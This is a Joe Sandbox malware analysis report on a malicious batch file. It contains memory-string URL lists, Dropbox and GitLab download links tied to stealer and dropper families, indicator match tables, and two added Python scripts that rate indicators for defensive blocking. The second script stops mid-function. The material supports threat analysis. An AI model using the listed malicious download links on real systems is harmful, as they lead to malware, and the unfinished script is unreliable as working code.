                                                                                                        http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.2201398911.000001F3901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2201398911.000001F390072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F3819EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E96A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2318880647.00000254E9562000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.0000024405A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://showcase.dropbox.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.dropbox.com/static/serviceworker/powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.dropbox.compowershell.exe, 0000000C.00000002.2186557399.000001F381368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F38162C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.2357881268.00000244042E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.2357881268.00000244042E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://go.micropowershell.exe, 0000000C.00000002.2186557399.000001F380C33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DA123000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.0000024404CE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://new-sentry.gitlab.netpowershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://contoso.com/Iconpowershell.exe, 00000010.00000002.2457157959.0000024414264000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.dropbox.com/v/s/playlist/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.2357881268.00000244042E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://docs.sandbox.google.com/document/fsip/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://docs.sandbox.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://docs.google.com/document/fsip/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://help.dropbox.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://docs.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://canny.io/sdk.jspowershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://gitlab.com/-/sandbox/powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://gitlab.com/admin/powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://customers.gitlab.compowershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://gitlab.com/-/speedscope/index.htmlpowershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://selfguidedlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://www.google.com/recaptcha/powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://sourcegraph.compowershell.exe, 0000000E.00000002.2259371706.00000254DAB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254DAB17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.dropbox.com/scl/fi/8wcdoh5jl9xy2op5nj983/12_advertising_campaign_and_collaboration.docx?powershell.exe, 0000000C.00000002.2211751712.000001F3F1640000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://aka.ms/pscore68powershell.exe, 0000000C.00000002.2186557399.000001F380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2259371706.00000254D94F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2357881268.00000244040B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://docs.sandbox.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmpfalse
URL | Source | Malicious | Antivirus Detection | Reputation
(row continued from above) | | | Avira URL Cloud: safe | unknown
https://dl-web.dropbox.com/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://app.hellofax.com/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cfl.dropboxstatic.com/static/ | powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.paypal.com/sdk/js | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/scl/fi/8wcdoh5jl9xyp5 (truncated in memory) | powershell.exe, 0000000C.00000002.2211796512.000001F3F1734000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.google.com/spreadsheets/fsip/ | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist | powershell.exe, 0000000C.00000002.2186557399.000001F381651000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000C.00000002.2186557399.000001F381631000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000C.00000002.2186557399.000001F381655000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.65.251.78 | gitlab.com | United States | 13335 | CLOUDFLARENETUS | false
162.125.66.18 | www-env.dropbox-dns.com | United States | 19679 | DROPBOXUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557463
Start date and time: 2024-11-18 09:55:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: hnl2bose13.bat
Detection: MAL
Classification: mal96.troj.evad.winBAT@30/16@3/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 22
• Number of non-executed functions: 6
Cookbook Comments:
• Found application associated with file extension: .bat
• Processes excluded from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Domains excluded from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1584 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3852 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5896 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• VT rate limit hit for: hnl2bose13.bat
Time | Type | Description
03:56:02 | API Interceptor | 61x Sleep call for process: powershell.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
172.65.251.78 | build_setup.exe | malicious | Vidar | gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
162.125.66.18 | 2h2xLB9h1L.lnk | malicious | Abobus Obfuscator |
162.125.66.18 | 13jhsfbose.bat | malicious | Abobus Obfuscator, Braodo |
162.125.66.18 | scut18bo03.bat | malicious | Abobus Obfuscator, Braodo |
162.125.66.18 | bose2scut18.bat | malicious | Abobus Obfuscator |
162.125.66.18 | 18cut04.bat | malicious | Abobus Obfuscator |
162.125.66.18 | bose1511mkt.bat | malicious | Abobus Obfuscator |
162.125.66.18 | https://www.dropbox.com/l/scl/AAATBuomd5HmxEQWOFFl7juYr5pumA9OT78 | malicious | Unknown |
162.125.66.18 | https://www.dropbox.com/scl/fi/ghbickob35cseupehrevo/A-file-has-been-sent-to-you-via-DROPBOX.pdf?oref=e&r=ACTqvRbsSp0aGfWJ258Mnmig2JSiZYPEXawWQbeoOGqhLQ0A_g08q_6x9uCS3GDD06X2I92wp1DOmKpzocpy-33mPeFHFTHNUnOplz6Tt7UNKnGCY5hdeIU9t4fHEX4CzcseX3o9vxkcg76RpGddDTfgU6DIWzrB6Y3NN3SHwd0oXjHE8-2WVTMkcFhAlN56hFRzwFRs7uWEYIbpWWN2yfXr&sm=1&dl=0 | malicious | Unknown |
162.125.66.18 | Metro Plastics Technologies.pdf | malicious | Unknown |
162.125.66.18 | https://t.ly/BavariaFilmGmbH2410 | malicious | Unknown |
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
gitlab.com | 2h2xLB9h1L.lnk | malicious | Abobus Obfuscator | 172.65.251.78
gitlab.com | 13jhsfbose.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
gitlab.com | kQ3WxQb6bw.lnk | malicious | Unknown | 172.65.251.78
gitlab.com | 36yw96m7Ni.lnk | malicious | Unknown | 172.65.251.78
gitlab.com | scut18bo03.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78
gitlab.com | bose2scut18.bat | malicious | Abobus Obfuscator | 172.65.251.78
gitlab.com | 18cut04.bat | malicious | Abobus Obfuscator | 172.65.251.78
gitlab.com | bose1511mkt.bat | malicious | Abobus Obfuscator | 172.65.251.78
gitlab.com | m2.exe | malicious | Xmrig | 172.65.251.78
gitlab.com | SecuriteInfo.com.FileRepMalware.25861.18393.exe | malicious | Unknown | 172.65.251.78
edge-block-www-env.dropbox-dns.com | 2h2xLB9h1L.lnk | malicious | Abobus Obfuscator | 162.125.66.15
edge-block-www-env.dropbox-dns.com | 13jhsfbose.bat | malicious | Abobus Obfuscator, Braodo | 162.125.66.15
edge-block-www-env.dropbox-dns.com | scut18bo03.bat | malicious | Abobus Obfuscator, Braodo | 162.125.66.15
edge-block-www-env.dropbox-dns.com | bose2scut18.bat | malicious | Abobus Obfuscator | 162.125.66.15
edge-block-www-env.dropbox-dns.com | 18cut04.bat | malicious | Abobus Obfuscator | 162.125.66.15
edge-block-www-env.dropbox-dns.com | bose1511mkt.bat | malicious | Abobus Obfuscator | 162.125.66.15
edge-block-www-env.dropbox-dns.com | protected.ps1 | malicious | Unknown | 162.125.65.15
edge-block-www-env.dropbox-dns.com | https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0 | malicious | Abobus Obfuscator | 162.125.66.15
edge-block-www-env.dropbox-dns.com | https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0 | malicious | Unknown | 162.125.66.15
edge-block-www-env.dropbox-dns.com | https://t.ly/BavariaFilmGmbH2410 | malicious | Unknown | 162.125.66.15
www-env.dropbox-dns.com | 2h2xLB9h1L.lnk | malicious | Abobus Obfuscator | 162.125.66.18
www-env.dropbox-dns.com | 13jhsfbose.bat | malicious | Abobus Obfuscator, Braodo | 162.125.66.18
www-env.dropbox-dns.com | scut18bo03.bat | malicious | Abobus Obfuscator, Braodo | 162.125.66.18
www-env.dropbox-dns.com | bose2scut18.bat | malicious | Abobus Obfuscator | 162.125.66.18
www-env.dropbox-dns.com | 18cut04.bat | malicious | Abobus Obfuscator | 162.125.66.18
www-env.dropbox-dns.com | bose1511mkt.bat | malicious | Abobus Obfuscator | 162.125.66.18
www-env.dropbox-dns.com | https://www.dropbox.com/l/scl/AABC0x3zULW7L39lSlgXhTBIyuorli3cJh8 | malicious | Unknown | 162.125.65.18
www-env.dropbox-dns.com | protected.ps1 | malicious | Unknown | 162.125.65.18
www-env.dropbox-dns.com | https://t.ly/Oppenheim0511 | malicious | GO Backdoor | 162.125.65.18
www-env.dropbox-dns.com | FW Reminder Steve Daugherty shared ALAMO1 _ AGREEMENT.paper with you.msg | malicious | Unknown | 162.125.67.18
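The IP, domain and ASN match tables above are pivot data: an indicator is only a useful block or hunt rule when the samples sharing it belong to one campaign. gitlab.com and the Dropbox edge IPs are shared by Abobus Obfuscator/Braodo droppers, but the same GitLab front (Cloudflare AS13335) also serves Vidar and Xmrig, and the whole ASN is shared with unrelated families. The script below is an added example, not part of the Joe Sandbox report: it scores each indicator by how many distinct samples share it and how many unrelated threat-family clusters those samples span, merging families that the sandbox reports together in one sample (such as "Abobus Obfuscator, Braodo") so a loader/payload pair is not counted as two unrelated threats. The rows are a constructed subset transcribed from the tables above; the rating tiers are my own assumption, not a Joe Sandbox metric.

```python
"""Score sandbox 'associated sample' pivots for blocking/hunting value.

Added example (not Joe Sandbox code). Input rows mirror the Match tables:
(indicator, kind, sample, threat name). Rating thresholds are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Pivot:
    indicator: str   # IP, domain or ASN name, as in the Match column
    kind: str        # "ip", "domain" or "asn"
    sample: str      # associated sample name / URL
    threat: str      # Threat Name column; "Unknown" when no family was assigned


# Constructed rows transcribed from the report's match tables (a subset).
PIVOTS = [
    Pivot("172.65.251.78", "ip", "build_setup.exe", "Vidar"),
    Pivot("gitlab.com", "domain", "2h2xLB9h1L.lnk", "Abobus Obfuscator"),
    Pivot("gitlab.com", "domain", "13jhsfbose.bat", "Abobus Obfuscator, Braodo"),
    Pivot("gitlab.com", "domain", "m2.exe", "Xmrig"),
    Pivot("www-env.dropbox-dns.com", "domain", "scut18bo03.bat", "Abobus Obfuscator, Braodo"),
    Pivot("www-env.dropbox-dns.com", "domain", "bose1511mkt.bat", "Abobus Obfuscator"),
    Pivot("www-env.dropbox-dns.com", "domain", "protected.ps1", "Unknown"),
    Pivot("CLOUDFLARENETUS", "asn", "file.exe", "LummaC"),
    Pivot("CLOUDFLARENETUS", "asn", "Unlock_Tool_v2.6.5.exe", "Stealc, Vidar"),
]


def families(threat: str) -> set[str]:
    """Split 'Abobus Obfuscator, Braodo' into family names; drop 'Unknown'."""
    return {t.strip() for t in threat.split(",") if t.strip() and t.strip() != "Unknown"}


def family_clusters(pivots) -> dict[str, str]:
    """Map each family to a cluster id. Families that co-occur in one sample
    are merged with union-find, so a loader+payload pair counts as one threat."""
    parent: dict[str, str] = {}

    def find(x: str) -> str:
        parent.setdefault(x, x)
        while parent[x] != x:
            parent[x] = parent[parent[x]]   # path halving
            x = parent[x]
        return x

    for p in pivots:
        fams = sorted(families(p.threat))
        for f in fams:
            find(f)                          # register singletons
        for a, b in zip(fams, fams[1:]):
            parent[find(a)] = find(b)        # union co-occurring families
    return {f: find(f) for f in list(parent)}


def rate(kind: str, n_samples: int, n_clusters: int) -> str:
    """Assumed rating tiers for how specific an indicator is to one campaign."""
    if kind == "asn" or n_clusters > 1:
        return "low"       # a whole network, or shared by unrelated families
    if n_clusters == 0:
        return "unrated"   # nothing attributed; no family to pivot on
    if n_samples < 2:
        return "weak"      # one family, but only a single sighting
    return "high"


def score_pivots(pivots) -> dict[str, dict]:
    """Return {indicator: {kind, samples, clusters, rating}}."""
    cluster_of = family_clusters(pivots)
    kinds, samples, clusters = {}, defaultdict(set), defaultdict(set)
    for p in pivots:
        kinds[p.indicator] = p.kind
        samples[p.indicator].add(p.sample)
        clusters[p.indicator] |= {cluster_of[f] for f in families(p.threat)}
    return {
        i: {
            "kind": kinds[i],
            "samples": len(samples[i]),
            "clusters": len(clusters[i]),
            "rating": rate(kinds[i], len(samples[i]), len(clusters[i])),
        }
        for i in kinds
    }


if __name__ == "__main__":
    for ind, s in sorted(score_pivots(PIVOTS).items(), key=lambda kv: kv[1]["rating"]):
        print(f"{ind:28} {s['kind']:6} samples={s['samples']} "
              f"families={s['clusters']} -> {s['rating']}")
```

On the constructed rows, gitlab.com rates "low" (Abobus/Braodo and Xmrig are unrelated), the Cloudflare ASN rates "low" by kind, the single-sighting IP rates "weak", and www-env.dropbox-dns.com rates "high" because every attributed sample is from the same cluster. A "high" rating on a shared service domain still does not make the domain blockable; the specific share path (the dropbox.com/scl/fi/... URL in the memory strings above) is the indicator to act on.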
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.97.3
CLOUDFLARENETUS | http://www.employee-ratings.com/107519/fab30a/abf4a385-1883-4e57-8ade-771c19e19962 | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | https://app.powerbi.com/view?r=eyJrIjoiNjcyNzQ5NzAtNzgyNy00ZWU4LWI0YmEtNWI2ZTg2NjRlMzE2IiwidCI6ImJkMWRiODMyLWYwY2QtNDRiNS04ZTNjLTYxMmNlY2NhMjQ4ZSJ9&dp=688235 | malicious | Unknown | 104.21.94.71
CLOUDFLARENETUS | #U051d==.eml | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | Unlock_Tool_v2.6.5.exe | malicious | Stealc, Vidar | 172.64.41.3
CLOUDFLARENETUS | file.exe | malicious | PureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 188.114.96.3
CLOUDFLARENETUS | https://listonelove.buzz/zoom/zoommm.html | malicious | Unknown | 104.21.90.224
CLOUDFLARENETUS | file.exe | malicious | LummaC | 188.114.97.3
                                                                                                                                                                                        2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                        SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                        • 104.26.13.205
                                                                                                                                                                                        DROPBOXUS2h2xLB9h1L.lnkGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        13jhsfbose.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        scut18bo03.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        bose2scut18.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        18cut04.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        bose1511mkt.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                        • 162.125.66.18
                                                                                                                                                                                        https://www.dropbox.com/l/scl/AABC0x3zULW7L39lSlgXhTBIyuorli3cJh8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 162.125.1.20
                                                                                                                                                                                        protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                        meerkat.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                        • 162.125.189.88
                                                                                                                                                                                        https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                                                                                                                                                                                        • 162.125.67.15
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e
  LzmJLVB41K.exe | malicious | DCRat, PureLog Stealer, zgRAT | 172.65.251.78, 162.125.66.18
  2h2xLB9h1L.lnk | malicious | Abobus Obfuscator | 172.65.251.78, 162.125.66.18
  SOA.exe | malicious | AgentTesla | 172.65.251.78, 162.125.66.18
  13jhsfbose.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78, 162.125.66.18
  kQ3WxQb6bw.lnk | malicious | Unknown | 172.65.251.78, 162.125.66.18
  36yw96m7Ni.lnk | malicious | Unknown | 172.65.251.78, 162.125.66.18
  scut18bo03.bat | malicious | Abobus Obfuscator, Braodo | 172.65.251.78, 162.125.66.18
  TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 172.65.251.78, 162.125.66.18
  bose2scut18.bat | malicious | Abobus Obfuscator | 172.65.251.78, 162.125.66.18
  18cut04.bat | malicious | Abobus Obfuscator | 172.65.251.78, 162.125.66.18
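The context tables above are more useful read as a whole than as a list of addresses to block: the same two IPs and the same client fingerprint turn up beside LummaC, AgentTesla, DCRat, Mirai and the Abobus/Braodo .bat files alike. As an added example that is not part of the Joe Sandbox report, the script below transcribes rows from the CLOUDFLARENETUS and DROPBOXUS tables and from the table keyed by 3b5074b1b5d032e5620f69f9f700ff0e (assumed here to be the JA3 client fingerprint the signature list refers to; only a subset of that table's rows is included), counts how many distinct named families each indicator was observed with, and marks an indicator shared by three or more families, or an IP whose ASN is, as infrastructure rather than attacker-specific. The threshold and the `asn:`/`ip:`/`ja3:` prefixes are this example's own conventions.

```python
"""Rate the network indicators from this report's context tables.

Added example; not part of the Joe Sandbox report. Rows are transcribed
from the tables above (a subset of the fingerprint table). The prefixes
"asn:", "ip:" and "ja3:" are this example's own convention.
"""
from collections import defaultdict

JA3 = "ja3:3b5074b1b5d032e5620f69f9f700ff0e"  # assumed to be the JA3 client hash
SHARED_THRESHOLD = 3  # families needed before an indicator counts as shared infrastructure

# (sample name, threat names as listed, indicators seen with that sample)
CONTEXT_ROWS = [
    # ASN table: CLOUDFLARENETUS
    ("file.exe", ["LummaC"], ["asn:CLOUDFLARENETUS", "ip:188.114.97.3"]),
    ("Unlock_Tool_v2.6.5.exe", ["Stealc", "Vidar"], ["asn:CLOUDFLARENETUS", "ip:172.64.41.3"]),
    ("file.exe", ["PureCrypter", "LummaC", "Amadey", "Credential Flusher",
                  "LummaC Stealer", "Stealc", "Vidar"], ["asn:CLOUDFLARENETUS", "ip:188.114.96.3"]),
    ("2h2xLB9h1L.lnk", ["Abobus Obfuscator"], ["asn:CLOUDFLARENETUS", "ip:172.65.251.78"]),
    ("SOA.exe", ["AgentTesla"], ["asn:CLOUDFLARENETUS", "ip:104.26.13.205"]),
    # ASN table: DROPBOXUS
    ("2h2xLB9h1L.lnk", ["Abobus Obfuscator"], ["asn:DROPBOXUS", "ip:162.125.66.18"]),
    ("13jhsfbose.bat", ["Abobus Obfuscator", "Braodo"], ["asn:DROPBOXUS", "ip:162.125.66.18"]),
    ("scut18bo03.bat", ["Abobus Obfuscator", "Braodo"], ["asn:DROPBOXUS", "ip:162.125.66.18"]),
    ("bose2scut18.bat", ["Abobus Obfuscator"], ["asn:DROPBOXUS", "ip:162.125.66.18"]),
    ("18cut04.bat", ["Abobus Obfuscator"], ["asn:DROPBOXUS", "ip:162.125.66.18"]),
    ("bose1511mkt.bat", ["Abobus Obfuscator"], ["asn:DROPBOXUS", "ip:162.125.66.18"]),
    ("meerkat.spc.elf", ["Mirai"], ["asn:DROPBOXUS", "ip:162.125.189.88"]),
    ("https://t.ly/Oppenheim0511", ["GO Backdoor"], ["asn:DROPBOXUS", "ip:162.125.67.15"]),
    # Fingerprint table (every row lists the same two IPs)
    ("LzmJLVB41K.exe", ["DCRat", "PureLog Stealer", "zgRAT"], [JA3, "ip:172.65.251.78", "ip:162.125.66.18"]),
    ("SOA.exe", ["AgentTesla"], [JA3, "ip:172.65.251.78", "ip:162.125.66.18"]),
    ("TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exe",
     ["Snake Keylogger", "VIP Keylogger"], [JA3, "ip:172.65.251.78", "ip:162.125.66.18"]),
    ("kQ3WxQb6bw.lnk", ["Unknown"], [JA3, "ip:172.65.251.78", "ip:162.125.66.18"]),
]


def families_per_indicator(rows):
    """Map every indicator to the set of named families it was observed with."""
    seen = defaultdict(set)
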